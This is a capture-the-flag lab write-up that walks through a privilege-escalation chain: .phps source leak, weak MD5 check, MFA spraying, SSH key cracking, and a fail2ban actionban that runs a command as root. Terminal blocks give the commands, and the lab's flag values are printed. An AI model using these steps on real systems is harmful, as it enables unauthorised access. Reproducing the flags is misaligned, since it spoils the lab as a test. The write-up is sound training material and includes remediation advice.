PHPS source leak, MFA spray, SSH key crack, and fail2ban root
Intermediate Linux engagement: /console exposed .phps sources and a weak MD5 password check; MFA brute and file browser yielded jason’s encrypted id_rsa; sudo to fred plus writable fail2ban actionban copied root.txt on SSH ban trigger.
- Case files
- PHPS source leak, MFA spray, SSH key crack, and fail2ban root
gobuster found /console; .phps leaked LOGIN_USER and MD5 suffix check (violet); MFA sprayed; jason id_rsa cracked; sudo -u fred → fail2ban actionban → root artifact.
Recovered violet + MFA; cracked id_rsa; authenticated as jason.
sudo -u fred; poisoned iptables-multiport actionban; triggered SSH bans.
Engagement summary
gobuster found /console; .phps leaked LOGIN_USER and MD5 suffix check (violet); MFA sprayed; jason id_rsa cracked; sudo -u fred → fail2ban actionban → root artifact.
BITEME hosted SSH and HTTP with an Apache default page. Directory brute force uncovered /console/. Obfuscated JavaScript set a hidden clicked=yes field and left a console note that PHP syntax highlighting was enabled for review — classic .phps exposure. Requesting index.phps / functions.phps / config.phps leaked LOGIN_USER (hex → bin) and is_valid_pwd logic: MD5(password) must end in 001. Rockyou scan recovered violet (md5 …8001). Post-login MFA accepted a four-digit code with no lockout — sprayed 1000–9999. Admin file browser read /home/jason/user.txt (THM{6fbf1fb7241dac060cd3abba70c33070}) and jason’s encrypted id_rsa. ssh2john + john cracked the key passphrase; SSH as jason. sudo -l allowed passwordless switch to fred; fred could restart fail2ban as root and owned writable /etc/fail2ban/action.d/iptables-multiport.conf. Rewriting actionban to copy /root/root.txt to /tmp, restarting fail2ban, and triggering SSH bans executed the copy as root — THM{0e355b5c907ef7741f40f4a41cc6678d}.
Business impact
.phps and debug notes in production are source disclosure. Truncated-hash password checks and unprotected MFA are trivial to defeat. Writable fail2ban action scripts with sudo restart are root RCE on the next ban event — treat IDS tooling configs as privileged code.
Console source leak to jason SSH
Recovered violet + MFA; cracked id_rsa; authenticated as jason.
OPERATOR · WEB / SSH
savvy@lab:~$ gobuster dir -u http://10.10.10.10 -w common.txt
/console (200)
savvy@lab:~$ curl -s http://10.10.10.10/console/config.phps | head
LOGIN_USER hex → jason_test_account · pwd MD5 ends 001
savvy@lab:~$ # rockyou → violet (…8001)
savvy@lab:~$ ssh2john id_rsa > id_rsa.hash && john --wordlist=rockyou.txt id_rsa.hash
savvy@lab:~$ chmod 600 id_rsa && ssh -i id_rsa jason@10.10.10.10
jason@10.10.10.10 → savvy@lab:~$
fred sudo fail2ban actionban to root
sudo -u fred; poisoned iptables-multiport actionban; triggered SSH bans.
OPERATOR · PRIVESC
savvy@lab:~$ sudo -u fred bash
savvy@lab:~$ sudo -l
(root) NOPASSWD: /bin/systemctl restart fail2ban
savvy@lab:~$ # edit actionban = cp /root/root.txt /tmp/root.txt && chmod 755 /tmp/root.txt
savvy@lab:~$ sudo systemctl restart fail2ban
savvy@lab:~$ # fail SSH 3× → ban fires as root
savvy@lab:~$ cat /tmp/root.txt
THM{0e355b5c907ef7741f40f4a41cc6678d}
ACTIONBAN
iptables-multiport.conf
actionban = cp /root/root.txt /tmp/root.txt && chmod 755 /tmp/root.txtRemediation
Disable .phps handlers; remove obfuscated debug notes. Use full-strength password hashes and MFA rate limits. Own fail2ban configs as root:root 644; never grant NOPASSWD restart plus write to action.d. Monitor unexpected actionban changes.